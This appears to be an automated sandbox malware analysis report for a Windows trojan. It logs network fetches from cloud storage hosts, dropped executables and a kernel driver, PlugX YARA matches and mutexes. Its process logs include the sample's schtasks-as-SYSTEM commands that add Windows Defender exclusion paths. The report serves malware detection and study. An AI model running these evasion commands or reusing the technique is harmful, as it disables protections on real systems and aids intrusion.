Source: global traffic	HTTP traffic detected: GET /i.dat HTTP/1.1User-Agent: GetDataHost: ry2ihs.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /a.gif HTTP/1.1User-Agent: GetDataHost: ry2ihs.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /b.gif HTTP/1.1User-Agent: GetDataHost: ry2ihs.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /c.gif HTTP/1.1User-Agent: GetDataHost: ry2ihs.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /d.gif HTTP/1.1User-Agent: GetDataHost: ry2ihs.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /s.dat HTTP/1.1User-Agent: GetDataHost: ry2ihs.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /s.jpg HTTP/1.1User-Agent: GetDataHost: ry2ihs.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /drops.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /f.dat HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /FOM-50.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /FOM-51.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /FOM-52.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /FOM-53.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: ry2ihs.oss-cn-beijing.aliyuncs.com
Source: global traffic	DNS traffic detected: DNS query: 22mm.oss-cn-hangzhou.aliyuncs.com
Source: global traffic	DNS traffic detected: DNS query: ynyeqf.net

Source: Twhtlb.exe, 00000028.00000002.3984111016.000000001002D000.00000004.00001000.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3980248912.0000000002D60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://%s/%d.dll
Source: Twhtlb.exe, 00000028.00000002.3984111016.000000001002D000.00000004.00001000.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3980248912.0000000002D60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://%s/%d.dllC:
Source: Twhtlb.exe, Twhtlb.exe, 00000028.00000002.3984111016.000000001002D000.00000004.00001000.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3980248912.0000000002D60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://%s/ip.txt
Source: Twhtlb.exe, 00000028.00000002.3984111016.000000001002D000.00000004.00001000.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3980248912.0000000002D60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://%s/ip.txtC:
Source: Twhtlb.exe, 00000028.00000002.3984111016.000000001002D000.00000004.00001000.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3980248912.0000000002D60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://%s/upx.rar
Source: Twhtlb.exe, 00000028.00000002.3984111016.000000001002D000.00000004.00001000.00020000.00000000.sdmp, Twhtlb.exe, 00000028.00000002.3980248912.0000000002D60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://%s/upx.rarC:
Source: 189atohci.sys.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceCodeSigningCA-1.crt0
Source: 189atohci.sys.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: 189atohci.sys.0.dr, sgH8Ps.exe.0.dr	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: 189atohci.sys.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 189atohci.sys.0.dr	String found in binary or memory: http://crl3.digicert.com/ha-cs-2011a.crl0.
Source: 189atohci.sys.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 189atohci.sys.0.dr	String found in binary or memory: http://crl4.digicert.com/ha-cs-2011a.crl0L
Source: 45631.exe, 00000000.00000003.2575138249.000000000067E000.00000004.00000020.00020000.00000000.sdmp, 45631.exe, 00000000.00000003.2598868327.000000000067E000.00000004.00000020.00020000.00000000.sdmp, 45631.exe, 00000000.00000003.2622164187.000000000067E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://microsoft.co
Source: 189atohci.sys.0.dr	String found in binary or memory: http://ocsp.digicert.com0I
Source: 189atohci.sys.0.dr	String found in binary or memory: http://ocsp.digicert.com0P
Source: 189atohci.sys.0.dr, sgH8Ps.exe.0.dr	String found in binary or memory: http://ocsp.thawte.com0
Source: sgH8Ps.exe.0.dr	String found in binary or memory: http://s.symcb.com/pca3-g5.crl0
Source: sgH8Ps.exe.0.dr	String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: sgH8Ps.exe.0.dr	String found in binary or memory: http://s.symcd.com06
Source: sgH8Ps.exe.0.dr	String found in binary or memory: http://s.symcd.com0_
Source: sgH8Ps.exe.0.dr	String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: sgH8Ps.exe.0.dr	String found in binary or memory: http://s2.symcb.com0
Source: sgH8Ps.exe.0.dr	String found in binary or memory: http://sv.symcb.com/sv.crl0a
Source: sgH8Ps.exe.0.dr	String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: sgH8Ps.exe.0.dr	String found in binary or memory: http://sv.symcd.com0&
Source: sgH8Ps.exe.0.dr	String found in binary or memory: http://sw.symcb.com/sw.crl0
Source: sgH8Ps.exe.0.dr	String found in binary or memory: http://sw.symcd.com0
Source: sgH8Ps.exe.0.dr	String found in binary or memory: http://sw1.symcb.com/sw.crt0
Source: sgH8Ps.exe.0.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: 189atohci.sys.0.dr, sgH8Ps.exe.0.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: sgH8Ps.exe.0.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: 189atohci.sys.0.dr, sgH8Ps.exe.0.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: 189atohci.sys.0.dr, sgH8Ps.exe.0.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: sgH8Ps.exe.0.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: 189atohci.sys.0.dr	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: sgH8Ps.exe.0.dr	String found in binary or memory: http://www.symauth.com/cps0(
Source: sgH8Ps.exe.0.dr	String found in binary or memory: http://www.symauth.com/rpa00
Source: sgH8Ps.exe.0.dr	String found in binary or memory: https://d.symcb.com/cps0%
Source: sgH8Ps.exe.0.dr	String found in binary or memory: https://d.symcb.com/rpa0
Source: sgH8Ps.exe.0.dr	String found in binary or memory: https://d.symcb.com/rpa0)
Source: sgH8Ps.exe.0.dr	String found in binary or memory: https://d.symcb.com/rpa0.
Source: 45631.exe, 00000000.00000003.2622164187.000000000064F000.00000004.00000020.00020000.00000000.sdmp, 45631.exe, 00000000.00000003.2598868327.0000000000657000.00000004.00000020.00020000.00000000.sdmp, 45631.exe, 00000000.00000003.2575241713.000000000062C000.00000004.00000020.00020000.00000000.sdmp, 45631.exe, 00000000.00000003.2575138249.0000000000657000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ry2ihs.oss-cn-beijing.aliyuncs.com/
Source: 45631.exe, 00000000.00000003.2575138249.000000000067E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ry2ihs.oss-cn-beijing.aliyuncs.com/##ry2ihs.oss-cn-beijing.aliyuncs.com
Source: 45631.exe, 00000000.00000003.2622164187.000000000064F000.00000004.00000020.00020000.00000000.sdmp, 45631.exe, 00000000.00000003.2598868327.0000000000657000.00000004.00000020.00020000.00000000.sdmp, 45631.exe, 00000000.00000003.2575138249.0000000000657000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ry2ihs.oss-cn-beijing.aliyuncs.com/1-2246122658-3693405117-2476756634-1003
Source: 45631.exe, 00000000.00000003.2575138249.0000000000657000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ry2ihs.oss-cn-beijing.aliyuncs.com/7-2476756634-1003
Source: 45631.exe, 00000000.00000003.2575241713.000000000062C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ry2ihs.oss-cn-beijing.aliyuncs.com/RF
Source: 45631.exe, 00000000.00000003.2622164187.000000000067E000.00000004.00000020.00020000.00000000.sdmp, 45631.exe, 00000000.00000003.2575138249.0000000000652000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ry2ihs.oss-cn-beijing.aliyuncs.com/a.gif
Source: 45631.exe, 00000000.00000003.2598868327.000000000067E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ry2ihs.oss-cn-beijing.aliyuncs.com/a.gif1i
Source: 45631.exe, 00000000.00000003.2575138249.000000000067E000.00000004.00000020.00020000.00000000.sdmp, 45631.exe, 00000000.00000003.2598868327.000000000067E000.00000004.00000020.00020000.00000000.sdmp, 45631.exe, 00000000.00000003.2622164187.000000000067E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ry2ihs.oss-cn-beijing.aliyuncs.com/a.gifa
Source: 45631.exe, 00000000.00000003.2622164187.000000000064F000.00000004.00000020.00020000.00000000.sdmp, 45631.exe, 00000000.00000003.2598868327.0000000000652000.00000004.00000020.00020000.00000000.sdmp, 45631.exe, 00000000.00000003.2575138249.0000000000652000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ry2ihs.oss-cn-beijing.aliyuncs.com/a.gifhttps://ry2ihs.oss-cn-beijing.aliyuncs.com/b.gifhttp
Source: 45631.exe, 00000000.00000003.2575138249.000000000067E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ry2ihs.oss-cn-beijing.aliyuncs.com/a.gifoss-enq
Source: 45631.exe, 00000000.00000003.2622164187.000000000067E000.00000004.00000020.00020000.00000000.sdmp, 45631.exe, 00000000.00000003.2575138249.0000000000652000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ry2ihs.oss-cn-beijing.aliyuncs.com/b.gif
Source: 45631.exe, 00000000.00000003.2622164187.000000000067E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ry2ihs.oss-cn-beijing.aliyuncs.com/b.gif(i
Source: 45631.exe, 00000000.00000003.2622164187.000000000067E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ry2ihs.oss-cn-beijing.aliyuncs.com/b.gif-
Source: 45631.exe, 00000000.00000003.2622164187.000000000067E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ry2ihs.oss-cn-beijing.aliyuncs.com/b.gif.i
Source: 45631.exe, 00000000.00000003.2622164187.000000000067E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ry2ihs.oss-cn-beijing.aliyuncs.com/b.gif5i
Source: 45631.exe, 00000000.00000003.2622164187.000000000067E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ry2ihs.oss-cn-beijing.aliyuncs.com/b.gif9i
Source: 45631.exe, 00000000.00000003.2622164187.000000000064F000.00000004.00000020.00020000.00000000.sdmp, 45631.exe, 00000000.00000003.2598868327.0000000000652000.00000004.00000020.00020000.00000000.sdmp, 45631.exe, 00000000.00000003.2575138249.0000000000652000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ry2ihs.oss-cn-beijing.aliyuncs.com/c.gif
Source: 45631.exe, 00000000.00000003.2622164187.000000000064F000.00000004.00000020.00020000.00000000.sdmp, 45631.exe, 00000000.00000003.2598868327.0000000000652000.00000004.00000020.00020000.00000000.sdmp, 45631.exe, 00000000.00000003.2575138249.0000000000652000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ry2ihs.oss-cn-beijing.aliyuncs.com/d.gif
Source: 45631.exe, 00000000.00000003.2575241713.000000000062C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ry2ihs.oss-cn-beijing.aliyuncs.com/hF
Source: 45631.exe, 00000000.00000003.2575138249.000000000067E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ry2ihs.oss-cn-beijing.aliyuncs.com/i.dat
Source: 45631.exe, 00000000.00000003.2575241713.000000000062C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ry2ihs.oss-cn-beijing.aliyuncs.com/zF
Source: 189atohci.sys.0.dr	String found in binary or memory: https://www.digicert.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 49997 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49984
Source: unknown	Network traffic detected: HTTP traffic on port 49995 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49983
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49984 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49992 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49957
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49997
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49974
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49996
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49995
Source: unknown	Network traffic detected: HTTP traffic on port 49996 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49993
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49992
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49991
Source: unknown	Network traffic detected: HTTP traffic on port 49946 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49988 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49987 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49957 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49983 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49991 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49993 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49946
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49988
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49987

Source: unknown	HTTPS traffic detected: 39.103.20.59:443 -> 192.168.2.6:49946 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 118.178.60.9:443 -> 192.168.2.6:49991 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 6.2.sgH8Ps.exe.27e0000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: 40.2.Twhtlb.exe.3a40000.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: Process Memory Space: Twhtlb.exe PID: 3744, type: MEMORYSTR	Matched rule: PlugX Identifying Strings Author: Seth Hardy

PE file contains section with special chars

Source: tbcore3U.dll.7.dr	Static PE information: section name: .%?.
Source: tbcore3U.dll.7.dr	Static PE information: section name: .%-[
Source: tbcore3U.dll.7.dr	Static PE information: section name: .mo:
Source: tbcore3U.dll.40.dr	Static PE information: section name: .%?.
Source: tbcore3U.dll.40.dr	Static PE information: section name: .%-[
Source: tbcore3U.dll.40.dr	Static PE information: section name: .mo:

Source: C:\Users\user\Documents\sgH8Ps.exe

Code function: 6_2_0000000140006C95 NtAllocateVirtualMemory,

6_2_0000000140006C95

Source: C:\Users\user\Documents\sgH8Ps.exe

Code function: 6_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,

6_2_0000000140001520

Source: C:\Users\user\Desktop\45631.exe

File created: C:\Windows\System32\drivers\189atohci.sys

Jump to behavior

Source: C:\Users\user\Desktop\45631.exe

File created: C:\Windows\System32\drivers\189atohci.sys

Jump to behavior

Source: C:\Users\user\Desktop\45631.exe

File created: C:\Windows\System32\drivers\189atohci.sys

Jump to behavior

Source: C:\Users\user\Documents\sgH8Ps.exe	Code function: 6_2_000000014000C3F0	6_2_000000014000C3F0
Source: C:\Users\user\Documents\sgH8Ps.exe	Code function: 6_2_000000014000CC00	6_2_000000014000CC00
Source: C:\Users\user\Documents\sgH8Ps.exe	Code function: 6_2_0000000140001A30	6_2_0000000140001A30
Source: C:\Users\user\Documents\sgH8Ps.exe	Code function: 6_2_000000014000C2A0	6_2_000000014000C2A0
Source: C:\Users\user\Documents\sgH8Ps.exe	Code function: 6_2_00000001400022C0	6_2_00000001400022C0
Source: C:\Users\user\Documents\sgH8Ps.exe	Code function: 6_2_00000001400110F0	6_2_00000001400110F0
Source: C:\Users\user\Documents\sgH8Ps.exe	Code function: 6_2_0000000140010CF0	6_2_0000000140010CF0
Source: C:\Users\user\Documents\sgH8Ps.exe	Code function: 6_2_0000000140009300	6_2_0000000140009300
Source: C:\Users\user\Documents\sgH8Ps.exe	Code function: 6_2_000000014000BB70	6_2_000000014000BB70
Source: C:\Users\user\Documents\sgH8Ps.exe	Code function: 6_2_0000000140003F80	6_2_0000000140003F80
Source: C:\Users\user\Documents\sgH8Ps.exe	Code function: 6_2_00000001400103D0	6_2_00000001400103D0
Source: C:\Users\user\Documents\sgH8Ps.exe	Code function: 6_2_00007FFDA55DA1B8	6_2_00007FFDA55DA1B8
Source: C:\Users\user\Documents\sgH8Ps.exe	Code function: 6_2_00007FFDA55E0248	6_2_00007FFDA55E0248
Source: C:\Program Files (x86)\K5YQV85\6WWeC.exe	Code function: 42_2_00524AE2	42_2_00524AE2

Source: Joe Sandbox View	Dropped File: C:\Program Files (x86)\K5YQV85\6WWeC.exe 7BAFB7B02EA7C52D3511F3AC21C0586E92C44738AD992D63463AADC260C81722
Source: Joe Sandbox View	Dropped File: C:\Program Files (x86)\Twhtlb\Twhtlb.exe 7BAFB7B02EA7C52D3511F3AC21C0586E92C44738AD992D63463AADC260C81722

Source: 45631.exe, 00000000.00000000.2117321468.000000014001D000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameEasyDmsStart.exe` vs 45631.exe
Source: 45631.exe	Binary or memory string: OriginalFilenameEasyDmsStart.exe` vs 45631.exe

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f

Source: 6.2.sgH8Ps.exe.27e0000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 40.2.Twhtlb.exe.3a40000.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: Process Memory Space: Twhtlb.exe PID: 3744, type: MEMORYSTR	Matched rule: PlugXStrings author = Seth Hardy, description = PlugX Identifying Strings, last_modified = 2014-06-12

Source: 189atohci.sys.0.dr	Binary string: \Device\Driver\
Source: 189atohci.sys.0.dr	Binary string: \Device\TrueSight

Source: classification engine

Classification label: mal100.troj.evad.winEXE@65/29@8/3

Source: C:\Users\user\Documents\sgH8Ps.exe

Code function: 6_2_0000000140003F80 InitializeCriticalSection,#4,#4,GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,EnterCriticalSection,LeaveCriticalSection,GetVersionExW,RpcSsDontSerializeContext,RpcServerUseProtseqEpW,RpcServerRegisterIfEx,RpcServerListen,CreateWaitableTimerW,CreateEventW,SetWaitableTimer,

6_2_0000000140003F80

Source: C:\Users\user\Documents\sgH8Ps.exe

Code function: GetModuleFileNameW,OpenSCManagerW,GetLastError,CreateServiceW,CloseServiceHandle,GetLastError,CloseServiceHandle,

6_2_0000000140001430

Source: C:\Users\user\Documents\sgH8Ps.exe

6_2_0000000140001520

Source: C:\Users\user\Documents\sgH8Ps.exe

6_2_0000000140001520

Source: C:\Users\user\Documents\sgH8Ps.exe

File created: C:\Program Files (x86)\Twhtlb

Jump to behavior

Source: C:\Users\user\Desktop\45631.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\i[1].dat

Jump to behavior

Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\IEToolbarUninstaller
Source: C:\Users\user\Desktop\45631.exe	Mutant created: \Sessions\1\BaseNamedObjects\26f3475fc22
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Mutant created: \Sessions\1\BaseNamedObjects\aefd_048707
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Mutant created: \Sessions\1\BaseNamedObjects\{4E062DDA-444A-A2A8-84CE-E105F66A5AB3}
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:3768:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1860:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4492:120:WilError_03
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Mutant created: \Sessions\1\BaseNamedObjects\8.217.152.240:8917:Sauron
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:5268:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:5820:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:6024:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1364:120:WilError_03
Source: C:\Users\user\Documents\sgH8Ps.exe	Mutant created: \Sessions\1\BaseNamedObjects\48c47662941
Source: C:\Program Files (x86)\Twhtlb\Twhtlb.exe	Mutant created: \Sessions\1\BaseNamedObjects\LJPXYXC
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6256:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6564:120:WilError_03

Source: C:\Program Files (x86)\K5YQV85\6WWeC.exe	Command line argument: tbcore3.dll	42_2_00521000
Source: C:\Program Files (x86)\K5YQV85\6WWeC.exe	Command line argument: tbcore3.dll	42_2_00521000
Source: C:\Program Files (x86)\K5YQV85\6WWeC.exe	Command line argument: tbcore3U.dll	42_2_00521000
Source: C:\Program Files (x86)\K5YQV85\6WWeC.exe	Command line argument: tbcore3U.dll	42_2_00521000
Source: C:\Program Files (x86)\K5YQV85\6WWeC.exe	Command line argument: .R	42_2_00522E30

Source: 45631.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Documents\sgH8Ps.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\45631.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 45631.exe	Virustotal: Detection: 37%
Source: 45631.exe	ReversingLabs: Detection: 28%

Source: Twhtlb.exe	String found in binary or memory: <Repetition> <Interval>PT1M</Interval> <StopAtDurationEnd>false</StopAtDurationEnd> </Repetition> <Sta
Source: Twhtlb.exe	String found in binary or memory: <Repetition> <Interval>PT1M</Interval> <StopAtDurationEnd>false</StopAtDurationEnd> </Repetition> <Sta
Source: Twhtlb.exe	String found in binary or memory: tartIfOnBatteries> <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> <AllowHardTerminate>false</AllowHardTerminate>
Source: Twhtlb.exe	String found in binary or memory: tartIfOnBatteries> <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> <AllowHardTerminate>false</AllowHardTerminate>
Source: Twhtlb.exe	String found in binary or memory: <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <AllowStartOnDemand>t
Source: Twhtlb.exe	String found in binary or memory: <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <AllowStartOnDemand>t

Source: C:\Users\user\Desktop\45631.exe

File read: C:\Users\user\Desktop\45631.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\45631.exe "C:\Users\user\Desktop\45631.exe"
Source: unknown	Process created: C:\Users\user\Documents\sgH8Ps.exe C:\Users\user\Documents\sgH8Ps.exe
Source: unknown	Process created: C:\Users\user\Documents\sgH8Ps.exe C:\Users\user\Documents\sgH8Ps.exe
Source: C:\Users\user\Documents\sgH8Ps.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
Source: C:\Users\user\Documents\sgH8Ps.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
